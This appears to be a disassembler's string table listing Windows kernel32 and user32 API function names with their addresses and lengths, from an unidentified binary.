.text:00420168 0000000F C SetLocaleInfoA
.text:00420178 0000000D C SetLocalTime
.text:00420188 0000000D C SetLastError
.text:00420198 00000015 C SetHandleInformation
.text:004201B0 0000000F C SetHandleCount
.text:004201C0 0000000C C SetFileTime
.text:004201CC 0000000F C SetFilePointer
.text:004201DC 00000013 C SetFileAttributesW
.text:004201F0 00000013 C SetFileAttributesA
.text:00420204 00000011 C SetFileApisToOEM
.text:00420218 00000012 C SetFileApisToANSI
.text:0042022C 00000009 C SetEvent
.text:00420238 0000000D C SetErrorMode
.text:00420248 00000018 C SetEnvironmentVariableW
.text:00420260 00000018 C SetEnvironmentVariableA
.text:00420278 0000000D C SetEndOfFile
.text:00420288 00000016 C SetDefaultCommConfigW
.text:004202A0 00000016 C SetDefaultCommConfigA
.text:004202B8 00000015 C SetCurrentDirectoryW
.text:004202D0 00000015 C SetCurrentDirectoryA
.text:004202E8 00000015 C SetConsoleWindowInfo
.text:00420300 00000011 C SetConsoleTitleW
.text:00420314 00000011 C SetConsoleTitleA
.text:00420328 00000018 C SetConsoleTextAttribute
.text:00420340 0000001B C SetConsoleScreenBufferSize
.text:0042035D 00000012 C etConsoleOutputCP
.text:00420370 0000000F C SetConsoleMode
.text:00420380 00000019 C SetConsoleCursorPosition
.text:0042039C 00000015 C SetConsoleCursorInfo
.text:004203B4 00000016 C SetConsoleCtrlHandler
.text:004203CC 0000000D C SetConsoleCP
.text:004203DC 0000001D C SetConsoleActiveScreenBuffer
.text:004203FD 00000010 C etComputerNameW
.text:00420410 00000011 C SetComputerNameA
.text:00420424 00000010 C SetCommTimeouts
.text:00420434 0000000D C SetCommState
.text:00420444 0000000C C SetCommMask
.text:00420450 0000000E C SetCommConfig
.text:00420461 0000000C C etCommBreak
.text:00420470 00000011 C SetCalendarInfoW
.text:00420484 00000011 C SetCalendarInfoA
.text:00420498 0000000C C SearchPathW
.text:004204A4 0000000C C SearchPathA
.text:004204B0 0000001B C ScrollConsoleScreenBufferW
.text:004204CD 0000001A C crollConsoleScreenBufferA
.text:004204E8 0000000E C RtlFillMemory
.text:004204F8 0000000D C ResumeThread
.text:00420508 00000010 C ResetWriteWatch
.text:00420518 0000000B C ResetEvent
.text:00420524 00000015 C RequestWakeupLatency
.text:0042053C 00000014 C RequestDeviceWakeup
.text:00420550 00000011 C RemoveDirectoryW
.text:00420564 00000011 C RemoveDirectoryA
.text:00420578 00000011 C ReleaseSemaphore
.text:0042058C 0000000D C ReleaseMutex
.text:0042059C 00000012 C ReadProcessMemory
.text:004205B0 00000010 C ReadFileScatter
.text:004205C0 0000000B C ReadFileEx
.text:0041AF8C 00000019 C RegisterClipboardFormatW
.text:0041AFA8 00000019 C RegisterClipboardFormatA
.text:0041AFC4 0000000F C RegisterClassW
.text:0041AFD4 00000011 C RegisterClassExW
.text:0041AFE8 00000011 C RegisterClassExA
.text:0041AFFC 0000000F C RegisterClassA
.text:0041B00C 0000000D C RedrawWindow
.text:0041B01C 00000013 C RealGetWindowClass
.text:0041B030 00000019 C RealChildWindowFromPoint
.text:0041B04C 00000009 C PtInRect
.text:0041B058 00000013 C PostThreadMessageW
.text:0041B06C 00000013 C PostThreadMessageA
.text:0041B080 00000010 C PostQuitMessage
.text:0041B090 0000000D C PostMessageW
.text:0041B0A0 0000000D C PostMessageA
.text:0041B0B0 0000000D C PeekMessageW
.text:0041B0C0 0000000D C PeekMessageA
.text:0041B0D0 0000000D C PaintDesktop
.text:0041B0E0 0000000E C PackDDElParam
.text:0041B0F0 00000013 C OpenWindowStationW
.text:0041B104 00000013 C OpenWindowStationA
.text:0041B118 00000011 C OpenInputDesktop
.text:0041B12C 00000009 C OpenIcon
.text:0041B138 0000000D C OpenDesktopW
.text:0041B148 0000000D C OpenDesktopA
.text:0041B158 0000000E C OpenClipboard
.text:0041B168 0000000B C OffsetRect
.text:0041B174 0000000B C OemToCharW
.text:0041B180 0000000F C OemToCharBuffW
.text:0041B190 0000000F C OemToCharBuffA
.text:0041B1A0 0000000B C OemToCharA
.text:0041B1AC 0000000B C OemKeyScan
.text:0041B1B8 0000000F C NotifyWinEvent
.text:0041B1C8 0000001C C MsgWaitForMultipleObjectsEx
.text:0041B1E4 0000001A C MsgWaitForMultipleObjects
.text:0041B200 0000000B C MoveWindow
.text:0041B20C 00000012 C MonitorFromWindow
.text:0041B220 00000010 C MonitorFromRect
.text:0041B230 00000011 C MonitorFromPoint
.text:0041B244 0000000C C ModifyMenuW
.text:0041B250 0000000C C ModifyMenuA
.text:0041B25C 0000000C C MessageBoxW
.text:0041B268 00000014 C MessageBoxIndirectW
.text:0041B27C 00000014 C MessageBoxIndirectA
.text:0041B290 0000000E C MessageBoxExW
.text:0041B2A0 0000000E C MessageBoxExA
.text:0041B2B0 0000000C C MessageBoxA
.text:0041B2BC 0000000C C MessageBeep
.text:0041B2C8 00000012 C MenuItemFromPoint
.text:0041B2DC 00000010 C MapWindowPoints
.text:0041B2EC 0000000F C MapVirtualKeyW
.text:0041B2FC 00000011 C MapVirtualKeyExW
.text:0041B310 00000011 C MapVirtualKeyExA
.text:0041B324 0000000F C MapVirtualKeyA
.text:0041B334 0000000E C MapDialogRect
.text:0041B344 0000001C C LookupIconIdFromDirectoryEx
.text:0041B360 0000001A C LookupIconIdFromDirectory
.text:0041B37C 00000011 C LockWindowUpdate
.text:0041B390 0000000C C LoadStringW
.text:0041B39C 0000000C C LoadStringA
.text:0041B3A8 0000000A C LoadMenuW
.text:0041B3B4 00000012 C LoadMenuIndirectW
.text:0041B3C8 00000012 C LoadMenuIndirectA
.text:0041B3DC 0000000A C LoadMenuA
.text:0041B3E8 00000014 C LoadKeyboardLayoutW
.text:0041B3FC 00000014 C LoadKeyboardLayoutA
.text:0041B410 0000000B C LoadImageW
.text:0041B41C 0000000B C LoadImageA
.text:0041B428 0000000A C LoadIconW
.text:0041B434 0000000A C LoadIconA
.text:004205CC 00000009 C ReadFile
.text:004205D8 00000016 C ReadDirectoryChangesW
.text:004205F0 0000000D C ReadConsoleW
.text:00420600 00000013 C ReadConsoleOutputW
.text:00420614 0000001C C ReadConsoleOutputCharacterW
.text:00420630 0000001C C ReadConsoleOutputCharacterA
.text:0042064C 0000001B C ReadConsoleOutputAttribute
.text:00420668 00000013 C ReadConsoleOutputA
.text:0042067C 00000012 C ReadConsoleInputW
.text:00420690 00000012 C ReadConsoleInputA
.text:004206A4 0000000D C ReadConsoleA
.text:004206B4 0000000F C RaiseException
.text:004206C4 0000000D C QueueUserAPC
.text:004206D4 0000001A C QueryPerformanceFrequency
.text:004206F0 00000018 C QueryPerformanceCounter
.text:00420708 00000010 C QueryDosDeviceW
.text:00420718 00000010 C QueryDosDeviceA
.text:00420728 0000000A C PurgeComm
.text:00420734 0000000B C PulseEvent
.text:00420740 0000000E C Process32Next
.text:00420750 0000000F C Process32First
.text:00420760 0000000C C PrepareTape
.text:0042076C 0000001B C PostQueuedCompletionStatus
.text:00420788 0000000E C PeekNamedPipe
.text:00420798 00000012 C PeekConsoleInputW
.text:004207AC 00000012 C PeekConsoleInputA
.text:004207C0 00000013 C OutputDebugStringW
.text:004207D4 00000013 C OutputDebugStringA
.text:004207E8 00000013 C OpenWaitableTimerW
.text:004207FC 00000013 C OpenWaitableTimerA
.text:00420810 0000000F C OpenSemaphoreW
.text:00420820 0000000F C OpenSemaphoreA
.text:00420830 0000000C C OpenProcess
.text:0042083C 0000000B C OpenMutexW
.text:00420848 0000000B C OpenMutexA
.text:00420854 00000011 C OpenFileMappingW
.text:00420868 00000011 C OpenFileMappingA
.text:0042087C 00000009 C OpenFile
.text:00420888 0000000B C OpenEventW
.text:00420894 0000000B C OpenEventA
.text:004208A0 00000014 C MultiByteToWideChar
.text:004208B4 00000007 C MulDiv
.text:004208BC 0000000A C MoveFileW
.text:004208C8 0000000C C MoveFileExW
.text:004208D4 0000000C C MoveFileExA
.text:004208E0 0000000A C MoveFileA
.text:004208EC 0000000D C Module32Next
.text:004208FC 0000000E C Module32First
.text:0042090C 00000010 C MapViewOfFileEx
.text:0042091C 0000000E C MapViewOfFile
.text:0042092C 0000000D C LockResource
.text:0042093C 0000000B C LockFileEx
.text:00420948 00000009 C LockFile
.text:00420954 0000000C C LocalUnlock
.text:00420960 0000000A C LocalSize
.text:0042096C 0000000C C LocalShrink
.text:00420978 0000000D C LocalReAlloc
.text:00420988 0000000A C LocalLock
.text:00420994 0000000C C LocalHandle
.text:004209A0 0000000A C LocalFree
.text:004209AC 0000000B C LocalFlags
.text:004209B8 00000018 C LocalFileTimeToFileTime
.text:004209D0 0000000D C LocalCompact
.text:004209E0 0000000B C LocalAlloc
.text:004209EC 0000000D C LoadResource
.text:004209FC 0000000B C LoadModule
.text:00420A08 0000000D C LoadLibraryW
.text:00420A18 0000000F C LoadLibraryExW
.text:00420A28 0000000F C LoadLibraryExA
.text:00420A38 0000000D C LoadLibraryA
.text:0041B440 0000000C C LoadCursorW
.text:0041B44C 00000014 C LoadCursorFromFileW
.text:0041B460 00000014 C LoadCursorFromFileA
.text:0041B474 0000000C C LoadCursorA
.text:0041B480 0000000C C LoadBitmapW
.text:0041B48C 0000000C C LoadBitmapA
.text:0041B498 00000012 C LoadAcceleratorsW
.text:0041B4AC 00000012 C LoadAcceleratorsA
.text:0041B4C0 0000000A C KillTimer
.text:0041B4CC 00000009 C IsZoomed
.text:0041B4D8 00000010 C IsWindowVisible
.text:0041B4E8 00000010 C IsWindowUnicode
.text:0041B4F8 00000010 C IsWindowEnabled
.text:0041B508 00000009 C IsWindow
.text:0041B514 0000000C C IsRectEmpty
.text:0041B520 00000007 C IsMenu
.text:0041B528 00000009 C IsIconic
.text:0041B534 00000013 C IsDlgButtonChecked
.text:0041B548 00000011 C IsDialogMessageW
.text:0041B55C 00000011 C IsDialogMessageA
.text:0041B570 00000010 C IsDialogMessage
.text:0041B580 0000001B C IsClipboardFormatAvailable
.text:0041B59C 00000008 C IsChild
.text:0041B5A4 0000000D C IsCharUpperW
.text:0041B5B4 0000000D C IsCharUpperA
.text:0041B5C4 0000000D C IsCharLowerW
.text:0041B5D4 0000000D C IsCharLowerA
.text:0041B5E4 0000000D C IsCharAlphaW
.text:0041B5F4 00000014 C IsCharAlphaNumericW
.text:0041B608 00000014 C IsCharAlphaNumericA
.text:0041B61C 0000000D C IsCharAlphaA
.text:0041B62C 0000000B C InvertRect
.text:0041B638 0000000E C InvalidateRgn
.text:0041B648 0000000F C InvalidateRect
.text:0041B658 0000000E C IntersectRect
.text:0041B668 00000016 C InternalGetWindowText
.text:0041B680 0000000C C InsertMenuW
.text:0041B68C 00000010 C InsertMenuItemW
.text:0041B69C 00000010 C InsertMenuItemA
.text:0041B6AC 0000000C C InsertMenuA
.text:0041B6B8 0000000C C InflateRect
.text:0041B6C4 00000010 C InSendMessageEx
.text:0041B6D4 0000000E C InSendMessage
.text:0041B6E4 0000001B C ImpersonateDdeClientWindow
.text:0041B700 0000000F C HiliteMenuItem
.text:0041B710 0000000A C HideCaret
.text:0041B71C 0000000C C GrayStringW
.text:0041B728 0000000C C GrayStringA
.text:0041B734 0000000E C GetWindowWord
.text:0041B744 00000019 C GetWindowThreadProcessId
.text:0041B760 0000000F C GetWindowTextW
.text:0041B770 00000015 C GetWindowTextLengthW
.text:0041B788 00000015 C GetWindowTextLengthA
.text:0041B7A0 0000000F C GetWindowTextA
.text:0041B7B0 0000000D C GetWindowRgn
.text:0041B7C0 0000000E C GetWindowRect
.text:0041B7D0 00000013 C GetWindowPlacement
.text:0041B7E4 00000019 C GetWindowModuleFileNameW
.text:0041B800 00000019 C GetWindowModuleFileNameA
.text:0041B81C 0000000F C GetWindowLongW
.text:0041B82C 0000000F C GetWindowLongA
.text:0041B83C 0000000E C GetWindowInfo
.text:0041B84C 0000000C C GetWindowDC
.text:0041B858 00000017 C GetWindowContextHelpId
.text:0041B870 0000000A C GetWindow
.text:0041B87C 00000016 C GetUserObjectSecurity
.text:0041B894 0000001A C GetUserObjectInformationW
.text:0041B8B0 0000001A C GetUserObjectInformationA
.text:0041B8CC 0000000D C GetUpdateRgn
.text:0041B8DC 0000000E C GetUpdateRect
.text:00420A48 0000000D C LCMapStringW
.text:00420A58 0000000D C LCMapStringA
.text:00420A68 0000000E C IsValidLocale
.text:00420A78 00000010 C IsValidCodePage
.text:00420A88 00000018 C IsSystemResumeAutomatic
.text:00420AA0 0000001A C IsProcessorFeaturePresent
.text:00420ABC 00000012 C IsDebuggerPresent
.text:00420AD0 00000011 C IsDBCSLeadByteEx
.text:00420AE4 0000000F C IsDBCSLeadByte
.text:00420AF4 0000000E C IsBadWritePtr
.text:00420B04 00000010 C IsBadStringPtrW
.text:00420B14 00000010 C IsBadStringPtrA
.text:00420B24 0000000D C IsBadReadPtr
.text:00420B34 00000012 C IsBadHugeWritePtr
.text:00420B48 00000011 C IsBadHugeReadPtr
.text:00420B5C 0000000D C IsBadCodePtr
.text:00420B6C 00000026 C InitializeCriticalSectionAndSpinCount
.text:00420B94 0000000E C InitAtomTable
.text:00420BA4 00000009 C HeapWalk
.text:00420BB0 0000000D C HeapValidate
.text:00420BC0 0000000B C HeapUnlock
.text:00420BCC 00000009 C HeapLock
.text:00420BD8 00000009 C HeapFree
.text:00420BE4 0000000C C HeapDestroy
.text:00420BF0 0000000B C HeapCreate
.text:00420BFC 0000000C C HeapCompact
.text:00420C09 0000000A C eap32Next
.text:00420C14 0000000F C Heap32ListNext
.text:00420C24 00000010 C Heap32ListFirst
.text:00420C34 0000000C C Heap32First
.text:00420C40 0000000B C GlobalWire
.text:00420C4C 0000000D C GlobalUnlock
.text:00420C5C 0000000C C GlobalUnfix
.text:00420C68 0000000D C GlobalUnWire
.text:00420C79 0000000A C lobalSize
.text:00420C84 0000000E C GlobalReAlloc
.text:00420C94 00000013 C GlobalMemoryStatus
.text:00420CA8 0000000B C GlobalLock
.text:00420CB4 0000000D C GlobalHandle
.text:00420CC4 00000013 C GlobalGetAtomNameW
.text:00420CD8 00000013 C GlobalGetAtomNameA
.text:00420CED 0000000A C lobalFree
.text:00420CF8 0000000C C GlobalFlags
.text:00420D04 0000000A C GlobalFix
.text:00420D10 00000010 C GlobalFindAtomW
.text:00420D20 00000010 C GlobalFindAtomA
.text:00420D30 00000011 C GlobalDeleteAtom
.text:00420D44 0000000E C GlobalCompact
.text:00420D54 0000000C C GlobalAlloc
.text:00420D61 0000000E C lobalAddAtomW
.text:00420D70 0000000F C GlobalAddAtomA
.text:00420D80 0000000E C GetWriteWatch
.text:00420D90 00000015 C GetWindowsDirectoryW
.text:00420DA8 00000015 C GetWindowsDirectoryA
.text:00420DC0 00000016 C GetVolumeInformationW
.text:00420DD8 00000016 C GetVolumeInformationA
.text:00420DF0 0000000E C GetVersionExW
.text:00420E00 0000000E C GetVersionExA
.text:00420E10 0000000B C GetVersion
.text:00420E1C 00000015 C GetUserDefaultLangID
.text:00420E34 00000013 C GetUserDefaultLCID
.text:00420E48 00000017 C GetTimeZoneInformation
.text:00420E60 0000000F C GetTimeFormatW
.text:00420E70 0000000F C GetTimeFormatA
.text:00420E80 0000000D C GetTickCount
.text:00420E90 0000000F C GetThreadTimes
.text:00420EA0 00000017 C GetThreadSelectorEntry
.text:00420EB8 00000017 C GetThreadPriorityBoost
.text:00420ED0 00000012 C GetThreadPriority
.text:00420EE4 00000010 C GetThreadLocale
.text:0041B8EC 0000000D C GetTopWindow
.text:0041B8FC 00000010 C GetTitleBarInfo
.text:0041B90C 00000011 C GetThreadDesktop
.text:0041B920 00000015 C GetTabbedTextExtentW
.text:0041B938 00000015 C GetTabbedTextExtentA
.text:0041B950 00000011 C GetSystemMetrics
.text:0041B964 0000000E C GetSystemMenu
.text:0041B974 00000011 C GetSysColorBrush
.text:0041B988 0000000C C GetSysColor
.text:0041B994 0000000B C GetSubMenu
.text:0041B9A0 0000000F C GetShellWindow
.text:0041B9B0 0000000F C GetScrollRange
.text:0041B9C0 0000000D C GetScrollPos
.text:0041B9D0 0000000E C GetScrollInfo
.text:0041B9E0 00000011 C GetScrollBarInfo
.text:0041B9F4 0000000F C GetQueueStatus
.text:0041BA04 00000009 C GetPropW
.text:0041BA10 00000009 C GetPropA
.text:0041BA1C 00000018 C GetProcessWindowStation
.text:0041BA34 00000018 C GetProcessDefaultLayout
.text:0041BA4C 0000001B C GetPriorityClipboardFormat
.text:0041BA68 0000000A C GetParent
.text:0041BA74 00000017 C GetOpenClipboardWindow
.text:0041BA8C 00000012 C GetNextDlgTabItem
.text:0041BAA0 00000014 C GetNextDlgGroupItem
.text:0041BAB4 00000010 C GetMonitorInfoW
.text:0041BAC4 00000010 C GetMonitorInfoA
.text:0041BAD4 0000000C C GetMessageW
.text:0041BAE0 0000000F C GetMessageTime
.text:0041BAF0 0000000E C GetMessagePos
.text:0041BB00 00000014 C GetMessageExtraInfo
.text:0041BB14 0000000C C GetMessageA
.text:0041BB20 0000000F C GetMenuStringW
.text:0041BB30 0000000F C GetMenuStringA
.text:0041BB40 0000000D C GetMenuState
.text:0041BB50 00000010 C GetMenuItemRect
.text:0041BB60 00000011 C GetMenuItemInfoW
.text:0041BB74 00000011 C GetMenuItemInfoA
.text:0041BB88 0000000E C GetMenuItemID
.text:0041BB98 00000011 C GetMenuItemCount
.text:0041BBAC 0000000C C GetMenuInfo
.text:0041BBB8 00000013 C GetMenuDefaultItem
.text:0041BBCC 00000015 C GetMenuContextHelpId
.text:0041BBE4 0000001B C GetMenuCheckMarkDimensions
.text:0041BC00 0000000F C GetMenuBarInfo
.text:0041BC10 00000008 C GetMenu
.text:0041BC18 0000000F C GetListBoxInfo
.text:0041BC28 00000013 C GetLastActivePopup
.text:0041BC3C 00000010 C GetKeyboardType
.text:0041BC4C 00000011 C GetKeyboardState
.text:0041BC60 00000017 C GetKeyboardLayoutNameW
.text:0041BC78 00000017 C GetKeyboardLayoutNameA
.text:0041BC90 00000016 C GetKeyboardLayoutList
.text:0041BCA8 00000012 C GetKeyboardLayout
.text:0041BCBC 0000000C C GetKeyState
.text:0041BCC8 00000010 C GetKeyNameTextW
.text:0041BCD8 00000010 C GetKeyNameTextA
.text:0041BCE8 0000000E C GetKBCodePage
.text:0041BCF8 0000000E C GetInputState
.text:0041BD08 00000010 C GetInputDesktop
.text:0041BD18 0000000C C GetIconInfo
.text:0041BD24 00000010 C GetGuiResources
.text:0041BD34 00000011 C GetGUIThreadInfo
.text:0041BD48 00000014 C GetForegroundWindow
.text:0041BD5C 00000009 C GetFocus
.text:0041BD68 00000013 C GetDoubleClickTime
.text:0041BD7C 00000010 C GetDlgItemTextW
.text:0041BD8C 00000010 C GetDlgItemTextA
.text:0041BD9C 0000000E C GetDlgItemInt
.text:0041BDAC 0000000B C GetDlgItem
.text:00420EF4 00000011 C GetThreadContext
.text:00420F08 0000000D C GetTempPathW
.text:00420F18 0000000D C GetTempPathA
.text:00420F28 00000011 C GetTempFileNameW
.text:00420F3C 00000011 C GetTempFileNameA
.text:00420F50 0000000E C GetTapeStatus
.text:00420F60 00000010 C GetTapePosition
.text:00420F70 00000012 C GetTapeParameters
.text:00420F84 00000018 C GetSystemTimeAsFileTime
.text:00420F9C 00000018 C GetSystemTimeAdjustment
.text:00420FB4 0000000E C GetSystemTime
.text:00420FC4 00000015 C GetSystemPowerStatus
.text:00420FDC 0000000E C GetSystemInfo
.text:00420FEC 00000014 C GetSystemDirectoryW
.text:00421000 00000014 C GetSystemDirectoryA
.text:00421014 00000017 C GetSystemDefaultLangID
.text:0042102C 00000015 C GetSystemDefaultLCID
.text:00421044 0000000F C GetStringTypeW
.text:00421054 00000011 C GetStringTypeExW
.text:00421068 00000011 C GetStringTypeExA
.text:0042107C 0000000F C GetStringTypeA
.text:0042108C 0000000D C GetStdHandle
.text:0042109C 00000010 C GetStartupInfoW
.text:004210AC 00000010 C GetStartupInfoA
.text:004210BC 00000012 C GetShortPathNameW
.text:004210D0 00000012 C GetShortPathNameA
.text:004210E4 0000001A C GetQueuedCompletionStatus
.text:00421100 00000012 C GetProfileStringW
.text:00421114 00000012 C GetProfileStringA
.text:00421128 00000013 C GetProfileSectionW
.text:0042113C 00000013 C GetProfileSectionA
.text:00421150 0000000F C GetProfileIntW
.text:00421160 0000000F C GetProfileIntA
.text:00421170 00000019 C GetProcessWorkingSetSize
.text:0042118C 00000012 C GetProcessVersion
.text:004211A0 00000010 C GetProcessTimes
.text:004211B0 0000001D C GetProcessShutdownParameters
.text:004211D0 00000018 C GetProcessPriorityBoost
.text:004211E8 00000010 C GetProcessHeaps
.text:004211F8 0000000F C GetProcessHeap
.text:00421208 00000017 C GetProcessAffinityMask
.text:00421220 0000000F C GetProcAddress
.text:00421230 00000019 C GetPrivateProfileStructW
.text:0042124C 00000019 C GetPrivateProfileStructA
.text:00421268 00000019 C GetPrivateProfileStringW
.text:00421284 00000019 C GetPrivateProfileStringA
.text:004212A0 0000001A C GetPrivateProfileSectionW
.text:004212BC 0000001F C GetPrivateProfileSectionNamesW
.text:004212DC 0000001F C GetPrivateProfileSectionNamesA
.text:004212FC 0000001A C GetPrivateProfileSectionA
.text:00421318 00000016 C GetPrivateProfileIntW
.text:00421330 00000016 C GetPrivateProfileIntA
.text:00421348 00000011 C GetPriorityClass
.text:0042135C 00000014 C GetOverlappedResult
.text:00421370 00000009 C GetOEMCP
.text:0042137C 0000001F C GetNumberOfConsoleMouseButtons
.text:0042139C 0000001E C GetNumberOfConsoleInputEvents
.text:004213BC 00000011 C GetNumberFormatW
.text:004213D0 00000011 C GetNumberFormatA
.text:004213E4 00000011 C GetNamedPipeInfo
.text:004213F8 00000019 C GetNamedPipeHandleStateW
.text:00421414 00000019 C GetNamedPipeHandleStateA
.text:00421430 00000011 C GetModuleHandleW
.text:00421444 00000011 C GetModuleHandleA
.text:00421458 00000013 C GetModuleFileNameW
.text:0042146C 00000013 C GetModuleFileNameA
.text:00421480 00000010 C GetMailslotInfo
.text:00421490 00000011 C GetLongPathNameW
.text:004214A4 00000011 C GetLongPathNameA
.text:004214B8 00000011 C GetLogicalDrives
.text:0041BDB8 0000000D C GetDlgCtrlID
.text:0041BDC8 00000013 C GetDialogBaseUnits
.text:0041BDDC 00000011 C GetDesktopWindow
.text:0041BDF0 00000008 C GetDCEx
.text:0041BDF8 00000006 C GetDC
.text:0041BE00 0000000D C GetCursorPos
.text:0041BE10 0000000E C GetCursorInfo
.text:0041BE20 0000000A C GetCursor
.text:0041BE2C 00000010 C GetComboBoxInfo
.text:0041BE3C 00000013 C GetClipboardViewer
.text:0041BE50 0000001B C GetClipboardSequenceNumber
.text:0041BE6C 00000012 C GetClipboardOwner
.text:0041BE80 00000018 C GetClipboardFormatNameW
.text:0041BE98 00000018 C GetClipboardFormatNameA
.text:0041BEB0 00000011 C GetClipboardData
.text:0041BEC4 0000000E C GetClipCursor
.text:0041BED4 0000000E C GetClientRect
.text:0041BEE4 0000000D C GetClassWord
.text:0041BEF4 0000000E C GetClassNameW
.text:0041BF04 0000000E C GetClassNameA
.text:0041BF14 0000000E C GetClassLongW
.text:0041BF24 0000000E C GetClassLongA
.text:0041BF34 0000000E C GetClassInfoW
.text:0041BF44 00000010 C GetClassInfoExW
.text:0041BF54 00000010 C GetClassInfoExA
.text:0041BF64 0000000E C GetClassInfoA
.text:0041BF74 0000000C C GetCaretPos
.text:0041BF80 00000012 C GetCaretBlinkTime
.text:0041BF94 0000000B C GetCapture
.text:0041BFA0 00000011 C GetAsyncKeyState
.text:0041BFB4 0000000C C GetAncestor
.text:0041BFC0 0000000E C GetAltTabInfo
.text:0041BFD0 00000010 C GetActiveWindow
.text:0041BFE0 0000000E C FreeDDElParam
.text:0041BFF0 0000000A C FrameRect
.text:0041BFFC 0000000E C FlashWindowEx
.text:0041C00C 0000000C C FlashWindow
.text:0041C018 0000000C C FindWindowW
.text:0041C024 0000000E C FindWindowExW
.text:0041C034 0000000E C FindWindowExA
.text:0041C044 0000000C C FindWindowA
.text:0041C050 00000009 C FillRect
.text:0041C05C 0000000E C ExitWindowsEx
.text:0041C06C 00000011 C ExcludeUpdateRgn
.text:0041C080 0000000A C EqualRect
.text:0041C08C 0000000C C EnumWindows
.text:0041C098 00000014 C EnumWindowStationsW
.text:0041C0AC 00000014 C EnumWindowStationsA
.text:0041C0C0 00000012 C EnumThreadWindows
.text:0041C0D4 0000000B C EnumPropsW
.text:0041C0E0 0000000D C EnumPropsExW
.text:0041C0F0 0000000D C EnumPropsExA
.text:0041C100 0000000B C EnumPropsA
.text:0041C10C 00000015 C EnumDisplaySettingsW
.text:0041C124 00000017 C EnumDisplaySettingsExW
.text:0041C13C 00000017 C EnumDisplaySettingsExA
.text:0041C154 00000015 C EnumDisplaySettingsA
.text:0041C16C 00000014 C EnumDisplayMonitors
.text:0041C180 00000014 C EnumDisplayDevicesW
.text:0041C194 00000014 C EnumDisplayDevicesA
.text:0041C1A8 0000000E C EnumDesktopsW
.text:0041C1B8 0000000E C EnumDesktopsA
.text:0041C1C8 00000013 C EnumDesktopWindows
.text:0041C1DC 00000015 C EnumClipboardFormats
.text:0041C1F4 00000011 C EnumChildWindows
.text:0041C208 00000008 C EndTask
.text:0041C210 00000009 C EndPaint
.text:0041C21C 00000008 C EndMenu
.text:0041C224 0000000A C EndDialog
.text:0041C230 00000012 C EndDeferWindowPos
.text:004214CC 00000018 C GetLogicalDriveStringsW
.text:004214E4 00000018 C GetLogicalDriveStringsA
.text:004214FC 0000000F C GetLocaleInfoW
.text:0042150C 0000000F C GetLocaleInfoA
.text:0042151C 0000000D C GetLocalTime
.text:0042152C 0000000D C GetLastError
.text:0042153C 0000001C C GetLargestConsoleWindowSize
.text:00421558 00000015 C GetHandleInformation
.text:00421570 00000011 C GetFullPathNameW
.text:00421584 00000011 C GetFullPathNameA
.text:00421598 0000000C C GetFileType
.text:004215A4 0000000C C GetFileTime
.text:004215B0 0000000C C GetFileSize
.text:004215BC 0000001B C GetFileInformationByHandle
.text:004215D8 00000013 C GetFileAttributesW
.text:004215EC 00000015 C GetFileAttributesExW
.text:00421604 00000015 C GetFileAttributesExA
.text:0042161C 00000013 C GetFileAttributesA
.text:00421630 00000012 C GetExitCodeThread
.text:00421644 00000013 C GetExitCodeProcess
.text:00421658 00000018 C GetEnvironmentVariableW
.text:00421670 00000018 C GetEnvironmentVariableA
.text:00421688 00000017 C GetEnvironmentStringsW
.text:004216A0 00000017 C GetEnvironmentStringsA
.text:004216B8 00000016 C GetEnvironmentStrings
.text:004216D0 0000000E C GetDriveTypeW
.text:004216E0 0000000E C GetDriveTypeA
.text:004216F0 00000012 C GetDiskFreeSpaceW
.text:00421704 00000014 C GetDiskFreeSpaceExW
.text:00421718 00000014 C GetDiskFreeSpaceExA
.text:0042172C 00000012 C GetDiskFreeSpaceA
.text:00421740 00000014 C GetDevicePowerState
.text:00421754 00000016 C GetDefaultCommConfigW
.text:0042176C 00000016 C GetDefaultCommConfigA
.text:00421784 0000000F C GetDateFormatW
.text:00421794 0000000F C GetDateFormatA
.text:004217A4 00000013 C GetCurrentThreadId
.text:004217B8 00000011 C GetCurrentThread
.text:004217CC 00000014 C GetCurrentProcessId
.text:004217E0 00000012 C GetCurrentProcess
.text:004217F4 00000015 C GetCurrentDirectoryW
.text:0042180C 00000015 C GetCurrentDirectoryA
.text:00421824 00000013 C GetCurrencyFormatW
.text:00421838 00000013 C GetCurrencyFormatA
.text:0042184C 00000011 C GetConsoleTitleW
.text:00421860 00000011 C GetConsoleTitleA
.text:00421874 0000001B C GetConsoleScreenBufferInfo
.text:00421890 00000013 C GetConsoleOutputCP
.text:004218A4 0000000F C GetConsoleMode
.text:004218B4 00000015 C GetConsoleCursorInfo
.text:004218CC 0000000D C GetConsoleCP
.text:004218DC 00000011 C GetComputerNameW
.text:004218F0 00000011 C GetComputerNameA
.text:00421904 00000017 C GetCompressedFileSizeW
.text:0042191C 00000017 C GetCompressedFileSizeA
.text:00421934 00000010 C GetCommandLineW
.text:00421944 00000010 C GetCommandLineA
.text:00421954 00000010 C GetCommTimeouts
.text:00421964 0000000D C GetCommState
.text:00421974 00000012 C GetCommProperties
.text:00421988 00000013 C GetCommModemStatus
.text:0042199C 0000000C C GetCommMask
.text:004219A8 0000000E C GetCommConfig
.text:004219B8 00000011 C GetCalendarInfoW
.text:004219CC 00000011 C GetCalendarInfoA
.text:004219E0 0000000D C GetCPInfoExW
.text:004219F0 0000000D C GetCPInfoExA
.text:00421A00 0000000A C GetCPInfo
.text:00421A0C 0000000F C GetBinaryTypeW
.text:00421A1C 0000000F C GetBinaryTypeA
.text:0041C244 0000000D C EnableWindow
.text:0041C254 00000010 C EnableScrollBar
.text:0041C264 0000000F C EnableMenuItem
.text:0041C274 0000000F C EmptyClipboard
.text:0041C284 0000000C C EditWndProc
.text:0041C290 0000000A C DrawTextW
.text:0041C29C 0000000C C DrawTextExW
.text:0041C2A8 0000000C C DrawTextExA
.text:0041C2B4 0000000A C DrawTextA
.text:0041C2C0 0000000B C DrawStateW
.text:0041C2CC 0000000B C DrawStateA
.text:0041C2D8 0000000C C DrawMenuBar
.text:0041C2E4 0000000B C DrawIconEx
.text:0041C2F0 00000009 C DrawIcon
.text:0041C2FC 00000011 C DrawFrameControl
.text:0041C310 0000000A C DrawFrame
.text:0041C31C 0000000E C DrawFocusRect
.text:0041C32C 00000009 C DrawEdge
.text:0041C338 0000000C C DrawCaption
.text:0041C344 00000012 C DrawAnimatedRects
.text:0041C358 0000000B C DragObject
.text:0041C364 0000000B C DragDetect
.text:0041C370 00000010 C DlgDirSelectExW
.text:0041C380 00000010 C DlgDirSelectExA
.text:0041C390 00000018 C DlgDirSelectComboBoxExW
.text:0041C3A8 00000018 C DlgDirSelectComboBoxExA
.text:0041C3C0 0000000C C DlgDirListW
